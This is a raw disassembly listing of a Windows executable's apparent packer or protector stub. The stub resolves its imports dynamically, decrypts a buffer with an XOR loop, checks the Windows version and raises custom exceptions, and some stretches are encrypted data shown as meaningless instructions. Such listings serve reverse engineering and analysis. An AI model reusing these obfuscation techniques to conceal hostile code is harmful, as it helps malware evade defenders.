mov ecx, [ebp+var_8]
call sub_48E090
cmp eax, [ebp+var_50]
jz short loc_48E637
push 0
push 0
push 0
push 0EF0000F9h
call ds:dword_49F00C ; RaiseException
loc_48E637: ; CODE XREF: sub_48E2E0+344�j
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
call sub_48DF6E
add esp, 0Ch
cmp eax, [ebp+var_5C]
jz short loc_48E65F
push 0
push 0
push 0
push 0EF0000FBh
call ds:dword_49F00C ; RaiseException
loc_48E65F: ; CODE XREF: sub_48E2E0+36C�j
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_4A268C
push edx
call ds:dword_4A2670 ; FlushInstructionCache
mov eax, [ebp+var_48]
push eax
call ds:dword_49F008 ; LocalFree
mov ecx, [ebp+var_8]
push ecx
call ds:dword_49F008 ; LocalFree
push offset dword_4A2A28
call ds:dword_49F000 ; InitializeCriticalSection
push offset dword_4A2930
call ds:dword_49F000 ; InitializeCriticalSection
call sub_48F2E0
push 80h
call sub_49935A
add esp, 4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_48E6C6
mov ecx, [ebp+var_6C]
call sub_48EDD0
mov [ebp+var_70], eax
jmp short loc_48E6CD
; ---------------------------------------------------------------------------
loc_48E6C6: ; CODE XREF: sub_48E2E0+3D7�j
mov [ebp+var_70], 0
loc_48E6CD: ; CODE XREF: sub_48E2E0+3E4�j
mov edx, offset dword_48E720
mov eax, [ebp+var_70]
mov [edx+4], eax
call sub_499C17
mov ds:dword_4A70DC, eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov ds:dword_4A2698, edx
mov eax, [ebp+var_4]
mov ds:off_4A269C, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_48E2E0 endp
; ---------------------------------------------------------------------------
align 10h
loc_48E700: ; CODE XREF: sub_48EB8D�p
call sub_48E2E0
pop eax
call loc_48EE60
pop eax
mov [esp+24h], eax
popa
pop eax
pop eax
call eax
call sub_49B0BC
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
dword_48E720 dd 0 ; DATA XREF: sub_48E2E0:loc_48E6CD�o
; sub_4957BF+2B�o ...
db 90h
db 1Eh, 8Dh, 0
aHereisbootcode db 27h,'HEREISBOOTCODE',27h,0
align 10h
dw 7
unicode 0, <>,0
a_text db '.text',0 ; DATA XREF: _6:off_4A269C�o
align 4
dd 22174h, 1000h, 13600h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 1C3Ch, 24000h, 1000h, 13A00h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 656A0h, 26000h, 7600h, 14A00h
dd 3 dup(0)
dd 0C0000040h, 6478732Eh, 617461h, 18h, 8C000h, 200h, 1C000h
dd 3 dup(0)
dd 0C0000240h, 7865742Eh, 74h, 11ABFh, 8D000h, 0B600h
dd 1C200h, 3 dup(0)
dd 0E0000040h, 6164722Eh, 6174h, 0D76h, 9F000h, 0E00h
dd 27800h, 3 dup(0)
dd 0E0000040h, 7461642Eh, 61h, 7110h, 0A0000h, 1C00h, 28600h
dd 3 dup(0)
dd 0E0000040h, 0B3h dup(0)
dd 32000000h, 30353030h
db 35h, 31h, 38h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
call $+5
pusha
call sub_48EB8D
leave
mov ebp, 0BDAFECECh
pop ds
xor eax, [ebx-38D37179h]
cmpsd
hlt
start endp
; ---------------------------------------------------------------------------
db 8Bh, 0C7h, 0FBh
dd 0EBAC9813h, 52D84C31h, 348EEC70h, 0D5B0D49Bh, 0F66121F1h
dd 1E34462Fh, 7A9AE354h, 60646CC8h, 1EF6E815h, 606470E3h
dd 1EF6E815h
; ---------------------------------------------------------------------------
jecxz short loc_48EBEE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_48EB7E proc near ; CODE XREF: _4:0048EF39�p _4:0048FCB0�p ...
jmp sub_49589D
sub_48EB7E endp
; ---------------------------------------------------------------------------
jmp loc_4958B6
; ---------------------------------------------------------------------------
jmp loc_4958B6
; =============== S U B R O U T I N E =======================================
sub_48EB8D proc near ; CODE XREF: start+6�p
call loc_48E700
jmp sub_49EAB0
sub_48EB8D endp
; ---------------------------------------------------------------------------
jmp sub_49EAB0
; ---------------------------------------------------------------------------
dd 0CBCB4CE9h, 0E452E9DBh, 0E7E9626Dh, 0E9234555h, 0F16B8650h
dd 97153AEFh, 7A260882h, 89C5FCC8h, 0E94F1E3Eh, 20h, 0F3h
dd 2060400h, 9E6h, 5 dup(0)
dd 6489D51Ah, 12799D29h
db 0E9h, 0E2h
; ---------------------------------------------------------------------------
loc_48EBEE: ; CODE XREF: _4:0048EB7C�j
mov dword ptr [ebp-312464A8h], 2E6D7A6Eh
db 65h
js short near ptr dword_48EC60
db 2Eh
inc edx
dec edi
pop eax
; ---------------------------------------------------------------------------
db 0
dd 18h dup(0)
dword_48EC60 dd 59h dup(0) ; CODE XREF: _4:0048EBF8�j
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48EDD0 proc near ; CODE XREF: sub_48E2E0+3DC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+78h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+7Ch], 0
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_49F014 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_48EE12
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_49F00C ; RaiseException
loc_48EE12: ; CODE XREF: sub_48EDD0+2F�j
mov edx, [ebp+var_8]
push edx
call ds:dword_49F000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
add eax, 18h
push eax
call ds:dword_49F000 ; InitializeCriticalSection
mov ecx, [ebp+var_8]
add ecx, 30h
push ecx
call ds:dword_49F000 ; InitializeCriticalSection
mov edx, [ebp+var_8]
add edx, 48h
push edx
call ds:dword_49F000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_48EDD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48EE50 proc near ; CODE XREF: sub_493DD0+50�p
push ebp
mov ebp, esp
mov eax, ds:dword_4A2688
mov al, [eax+70h]
pop ebp
retn
sub_48EE50 endp
; ---------------------------------------------------------------------------
align 10h
loc_48EE60: ; CODE XREF: _4:0048E706�p
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov eax, [ebp+8]
mov ds:dword_4A2688, eax
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_48EE99
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4A2778 ; RaiseException
loc_48EE99: ; CODE XREF: _4:0048EE86�j
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp-8]
push ecx
call ds:dword_4A2728 ; GetProcAddress
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_48EEC2
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4A2778 ; RaiseException
loc_48EEC2: ; CODE XREF: _4:0048EEAF�j
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4A2674, eax
push 4
push 2000h
call ds:dword_4A273C ; GetTickCount
xor edx, edx
mov ecx, 8000h
div ecx
push edx
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4A267C, eax
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4A2678, eax
mov edx, ds:dword_4A2674
mov dword ptr [edx], 19660Dh
mov eax, ds:dword_4A2678
mov dword ptr [eax], 3C6EF35Fh
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-4], 0
push 2E0000h
call sub_48EB7E
adc eax, 3C65AC02h
cmpxchg [esi], cl
xchg edi, [edx+2E8519EFh]
cmp ecx, ebx
xchg eax, ecx
db 66h
out 0F9h, al ; AT 80287 data.
; 286 sends opcodes & operands and receives results.
mov [ecx+5Ch], ebp
dec edi
db 36h
pop edi
xlat
sbb ecx, [esi]
add [edx+7514A10Dh], eax
dec esp
xor [eax+73h], ecx
mov ds:48B5728Dh, al
db 3Eh
xor [ebx+78h], ecx
mov dl, 8Ah
fcomp qword ptr [eax+ebx*8-38h]
and eax, 8467D355h
xchg eax, ecx
sahf
and [ebp-136A0BBFh], al
or ah, [ebx-48D2FD85h]
inc edi
mov esp, 77849591h
add eax, 4C759C32h
pop ds
xchg eax, esi
push ds
cmp cl, [edi-1]
and al, 31h
db 3Eh
dec ebx
xor [ebp+72h], ah
; ---------------------------------------------------------------------------
aDmqqh?2rr3EUul db 'dqqH?23҅uE',8,'qEh',1Bh,0
db '!',0
db 0E8h, 0BCh, 0FBh
dd 9090FFFFh, 0C985C933h, 558BEE75h, 8D8D52E8h, 0FFFFFF18h
dd 41EFE8h, 216800h, 9BE80026h, 90FFFFFBh, 85C03390h, 6AEE75C0h
dd 840D8B08h, 51004A26h, 0FF188D8Dh, 94E8FFFFh, 68000046h
dd 26h, 0FFFB75E8h, 0DD7144FFh, 57C78D29h, 56C454C1h, 0E9957046h
dd 2E4E5B6Ch, 7725EB5Bh, 0ADF7793Fh, 0D11C487Eh, 0C4A7F072h
dd 3F5DFA9Bh, 75E9DCC2h, 0F7518C7h, 0B6514437h, 6D7A8355h
dd 0C0339090h, 0EE75C085h, 26840D8Bh, 118B004Ah, 0A1F05589h
dd 4A2684h, 4D89088Bh, 9468ECh, 0F3E80000h, 830000A2h
dd 858904C4h, 0FFFFFEFCh, 0FEFC958Bh, 9589FFFFh, 0FFFFFF14h
dd 25B9h, 8BC03300h, 0FFFF14BDh, 8BABF3FFh, 0FFFF1485h
dd 9400C7FFh, 8B000000h, 0FFFF148Dh, 15FF51FFh, 4A2738h
dd 0FF14958Bh, 428BFFFFh, 2680A310h, 85C7004Ah, 0FFFFFF10h
dd 0
; ---------------------------------------------------------------------------
mov ecx, ds:dword_4A2680
mov [ebp-10Ch], ecx
cmp dword ptr [ebp-10Ch], 0
jz short loc_48F0E8
cmp dword ptr [ebp-10Ch], 1
jz short loc_48F0F7
cmp dword ptr [ebp-10Ch], 2
jz short loc_48F14E
jmp loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F0E8: ; CODE XREF: _4:0048F0CF�j
mov dword ptr [ebp-0F0h], offset aWin32s ; "win32s"
jmp loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F0F7: ; CODE XREF: _4:0048F0D8�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_48F10F
mov dword ptr [ebp-0F0h], offset aWindows95_0 ; "Windows95"
jmp short loc_48F149
; ---------------------------------------------------------------------------
loc_48F10F: ; CODE XREF: _4:0048F101�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 0Ah
jnz short loc_48F127
mov dword ptr [ebp-0F0h], offset aWindows98_0 ; "Windows98"
jmp short loc_48F149
; ---------------------------------------------------------------------------
loc_48F127: ; CODE XREF: _4:0048F119�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 5Ah
jnz short loc_48F13F
mov dword ptr [ebp-0F0h], offset aWindowsme_0 ; "WindowsMe"
jmp short loc_48F149
; ---------------------------------------------------------------------------
loc_48F13F: ; CODE XREF: _4:0048F131�j
mov dword ptr [ebp-0F0h], offset aWindows9xUnkno ; "Windows9x(unknown)"
loc_48F149: ; CODE XREF: _4:0048F10D�j _4:0048F125�j ...
jmp loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F14E: ; CODE XREF: _4:0048F0E1�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+4], 3
jnz short loc_48F169
mov dword ptr [ebp-0F0h], offset aWindowsnt3_51 ; "WindowsNT(3.51)"
jmp loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F169: ; CODE XREF: _4:0048F158�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+4], 4
jnz short loc_48F181
mov dword ptr [ebp-0F0h], offset aWindowsnt4_0 ; "WindowsNT(4.0)"
jmp short loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F181: ; CODE XREF: _4:0048F173�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+4], 5
jnz short loc_48F1E1
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_48F1A5
mov dword ptr [ebp-0F0h], offset aWindows2000 ; "Windows2000"
jmp short loc_48F1DF
; ---------------------------------------------------------------------------
loc_48F1A5: ; CODE XREF: _4:0048F197�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 1
jnz short loc_48F1BD
mov dword ptr [ebp-0F0h], offset aWindowsxp_0 ; "WindowsXP"
jmp short loc_48F1DF
; ---------------------------------------------------------------------------
loc_48F1BD: ; CODE XREF: _4:0048F1AF�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 2
jnz short loc_48F1D5
mov dword ptr [ebp-0F0h], offset aWindows_net ; "Windows.NET"
jmp short loc_48F1DF
; ---------------------------------------------------------------------------
loc_48F1D5: ; CODE XREF: _4:0048F1C7�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_48F1DF: ; CODE XREF: _4:0048F1A3�j _4:0048F1BB�j ...
jmp short loc_48F1EB
; ---------------------------------------------------------------------------
loc_48F1E1: ; CODE XREF: _4:0048F18B�j
mov dword ptr [ebp-0F0h], offset aWindowsntUnkno ; "WindowsNT(unknown)"
loc_48F1EB: ; CODE XREF: _4:0048F0E3�j _4:0048F0F2�j ...
mov edx, [ebp-0ECh]
mov [ebp-108h], edx
mov eax, [ebp-108h]
push eax
call sub_4993DD
add esp, 4
mov ecx, ds:dword_4A2684
mov edx, [ecx+2Ch]
mov [ebp-0F4h], edx
cmp dword ptr [ebp-0F4h], 0
jz short loc_48F28F
mov eax, [ebp-0F4h]
mov [ebp-0FCh], eax
mov dword ptr [ebp-0F8h], 0
jmp short loc_48F245
; ---------------------------------------------------------------------------
loc_48F236: ; CODE XREF: _4:0048F28D�j
mov ecx, [ebp-0F8h]
add ecx, 1
mov [ebp-0F8h], ecx
loc_48F245: ; CODE XREF: _4:0048F234�j
cmp dword ptr [ebp-0F8h], 80h
jge short loc_48F28F
mov edx, [ebp-0FCh]
imul edx, 19660Dh
add edx, 3C6EF35Fh
mov [ebp-0FCh], edx
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov edx, [ecx+eax*4]
xor edx, [ebp-0FCh]
mov eax, [ebp-0F8h]
mov ecx, [ebp-0F4h]
mov [ecx+eax*4], edx
jmp short loc_48F236
; ---------------------------------------------------------------------------
loc_48F28F: ; CODE XREF: _4:0048F21C�j _4:0048F24F�j
mov edx, ds:dword_4A2684
mov eax, [edx+24h]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov ds:byte_4A2694, al
call sub_495DC0
mov ecx, [ebp-14h]
mov [ebp+8], ecx
cmp ds:dword_4A6A54, 0
jz short loc_48F2CD
push 0
push 0
push 0
mov edx, ds:dword_4A6A54
push edx
call ds:dword_4A2838 ; PostMessageA
loc_48F2CD: ; CODE XREF: _4:0048F2B8�j
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48F2E0 proc near ; CODE XREF: sub_48E2E0+3BE�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_49F014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_48F30B
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_49F00C ; RaiseException
loc_48F30B: ; CODE XREF: sub_48F2E0+18�j
push offset aClosehandle ; "CloseHandle"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26A4, eax
push offset aCreatefilea ; "CreateFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26A8, eax
push offset aCreatefilew ; "CreateFileW"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26AC, eax
push offset aCreatefilemapp ; "CreateFileMappingA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26B0, eax
push offset aCreatefilema_0 ; "CreateFileMappingW"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26B4, eax
push offset aCreateprocessa ; "CreateProcessA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26B8, eax
push offset aDebugbreak ; "DebugBreak"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26BC, eax
push offset aDeletefilea ; "DeleteFileA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26C0, eax
push offset aEntercriticals ; "EnterCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26C4, eax
push offset aExitprocess ; "ExitProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26C8, eax
push offset aFindclose ; "FindClose"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26CC, eax
push offset aFindfirstfilea ; "FindFirstFileA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26D0, eax
push offset aFindnextfilea ; "FindNextFileA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26D4, eax
push offset aFlushfilebuffe ; "FlushFileBuffers"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26D8, eax
push offset aFormatmessagea ; "FormatMessageA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26DC, eax
push offset aFreelibrary ; "FreeLibrary"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26E0, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26E4, eax
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26E8, eax
push offset aGetenvironment ; "GetEnvironmentVariableA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26EC, eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26F0, eax
push offset aGetfileattribu ; "GetFileAttributesA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26F4, eax
push offset aGetfileattri_0 ; "GetFileAttributesW"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26F8, eax
push offset aGetfileinforma ; "GetFileInformationByHandle"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A26FC, eax
push offset aGetfilesize ; "GetFileSize"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2700, eax
push offset aGetfiletime ; "GetFileTime"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2704, eax
push offset aGetfullpathnam ; "GetFullPathNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2708, eax
push offset aGetfullpathn_0 ; "GetFullPathNameW"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A270C, eax
push offset aGetlasterror ; "GetLastError"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2710, eax
push offset aGetmodulefilen ; "GetModuleFileNameA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2714, eax
push offset aGetmodulehandl ; "GetModuleHandleA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2718, eax
push offset aGetprivateprof ; "GetPrivateProfileIntA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A271C, eax
push offset aGetprivatepr_0 ; "GetPrivateProfileSectionNamesA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2720, eax
push offset aGetprivatepr_1 ; "GetPrivateProfileStringA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2724, eax
push offset aGetprocaddress ; "GetProcAddress"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2728, eax
push offset aGetsystemtimea ; "GetSystemTimeAsFileTime"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A272C, eax
push offset aGettempfilenam ; "GetTempFileNameA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2730, eax
push offset aGettemppatha ; "GetTempPathA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2734, eax
push offset aGetversionexa ; "GetVersionExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2738, eax
push offset aGettickcount ; "GetTickCount"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A273C, eax
push offset aHeapalloc ; "HeapAlloc"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2740, eax
push offset aHeapfree ; "HeapFree"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2744, eax
push offset aHeapcreate ; "HeapCreate"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2748, eax
push offset aInitializecrit ; "InitializeCriticalSection"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A274C, eax
push offset aDeletecritical ; "DeleteCriticalSection"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2750, eax
push offset aLeavecriticals ; "LeaveCriticalSection"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2754, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A275C, eax
push offset aLoadlibraryexa ; "LoadLibraryExA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2758, eax
push offset aLocalalloc ; "LocalAlloc"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2760, eax
push offset aLocalfree ; "LocalFree"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2764, eax
push offset aLockfile ; "LockFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2768, eax
push offset aMapviewoffile ; "MapViewOfFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A276C, eax
push offset aMultibytetowid ; "MultiByteToWideChar"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2770, eax
push offset aOpenprocess ; "OpenProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2774, eax
push offset aRaiseexception ; "RaiseException"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2778, eax
push offset aReadfile ; "ReadFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A277C, eax
push offset aSetenvironment ; "SetEnvironmentVariableA"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2780, eax
push offset aSetevent ; "SetEvent"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2784, eax
push offset aSetfilepointer ; "SetFilePointer"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2788, eax
push offset aSetlasterror ; "SetLastError"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A278C, eax
push offset aSetunhandledex ; "SetUnhandledExceptionFilter"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2790, eax
push offset aSleep ; "Sleep"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2794, eax
push offset aTerminateproce ; "TerminateProcess"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2798, eax
push offset aUnlockfile ; "UnlockFile"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A279C, eax
push offset aUnmapviewoffil ; "UnmapViewOfFile"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27A0, eax
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27A4, eax
push offset aVirtualfree ; "VirtualFree"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27A8, eax
push offset aVirtualprotect ; "VirtualProtect"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27AC, eax
push offset aVirtualquery ; "VirtualQuery"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27B0, eax
push offset aWaitforsingleo ; "WaitForSingleObject"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27B4, eax
push offset aWidechartomult ; "WideCharToMultiByte"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27B8, eax
push offset aWritefile ; "WriteFile"
mov ecx, [ebp+var_C]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27BC, eax
push offset aLstrcmpia ; "lstrcmpiA"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27C0, eax
push offset aUser32_dll_0 ; "user32.dll"
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_48F8D0
push 0
push 0
push 0
push 0EF0000F7h
call ds:dword_49F00C ; RaiseException
loc_48F8D0: ; CODE XREF: sub_48F2E0+5DD�j
push offset aChangedisplays ; "ChangeDisplaySettingsA"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27C4, eax
push offset aCharupperbuffa ; "CharUpperBuffA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27C8, eax
push offset aLoadimagea ; "LoadImageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27CC, eax
push offset aMessageboxa_0 ; "MessageBoxA"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27D0, eax
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27D4, eax
push offset aWvsprintfa ; "wvsprintfA"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27D8, eax
push offset aGdi32_dll_0 ; "gdi32.dll"
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_48F96D
push 0
push 0
push 0
push 0EF0000F6h
call ds:dword_49F00C ; RaiseException
loc_48F96D: ; CODE XREF: sub_48F2E0+67A�j
push offset aAddfontresourc ; "AddFontResourceA"
mov eax, [ebp+var_8]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27DC, eax
push offset aCreatecompat_0 ; "CreateCompatibleDC"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27E0, eax
